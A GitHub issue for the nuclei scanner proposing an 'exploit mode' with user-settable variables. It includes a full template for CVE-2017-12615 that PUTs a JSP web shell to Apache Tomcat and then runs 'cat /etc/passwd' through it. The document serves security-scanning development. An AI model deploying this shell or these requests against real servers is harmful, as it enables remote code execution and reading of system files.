### ISSUE TITLE
Add exploit mode

### ISSUE THREAD

**Issue by iiiusky** [projectdiscovery/nuclei#776]
**Is your feature request related to a problem? Please describe.**

I want to add a new exploit mode

**Describe the solution you'd like**

The verified vulnerabilities can be extended to make them more widely used in more situations

Can you join exp mode:
1. The vars field is added to the rules, the type is map[string]interface{}
2. In the payload, you can use the key defined in vars to control such places as executing commands, reading files, etc.
3. Use vars to predefine default variables in normal mode
4. In the attack mode, the user is guided to manually input data, so that the vulnerability can be used for other verification.

The conceptual verification warehouse is here (`except CVE-2017-12615.yaml, I will list it separately`)

https://github.com/iiiusky/nuclei/tree/exp-concept

I changed the following files:
1. v2/cmd/nuclei/main.go:88 [New ExploitMode option]
2. v2/pkg/protocols/http/http.go:76 [Add Vars field]
3. v2/pkg/protocols/http/request.go:257 [Add setVars method; add call setVars method]
4. v2/pkg/types/types.go:130 [New ExploitMode option]
5. Nuclei-templates/cves/2017/CVE-2017-12615.yaml:40 [change allowed variables]

The content of the changed file is as follows:
https://github.com/iiiusky/nuclei/commit/a4f86d2efcebe2d7681384d595d27731e43dffd6

CVE-2017-12615.yaml file content

```yaml
id: CVE-2017-12615

info:
  name: Apache Tomcat RCE
  author: pikpikcu
  severity: critical
  tags: cve,cve2017,apache,rce
  reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
  description: |
        By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
        This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
        However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
        Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.

requests:
  - method: PUT
    path:
      - "{{BaseURL}}/poc.jsp/"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
        <%@ page import="java.util.*,java.io.*"%>
        <%
        if (request.getParameter("cmd") != null) {
                out.println("Command: " + request.getParameter("cmd") + "<BR>");
                Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
                OutputStream os = p.getOutputStream();
                InputStream in = p.getInputStream();
                DataInputStream dis = new DataInputStream(in);
                String disr = dis.readLine();
                while ( disr != null ) {
                        out.println(disr);
                        disr = dis.readLine();
                        }
                }
        %>

  - method: GET
    path:
      - "{{BaseURL}}/poc.jsp?cmd={{cmd}}"

    vars:
      cmd: cat+%2Fetc%2Fpasswd
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
        part: body
      - type: status
        status:
          - 200
```
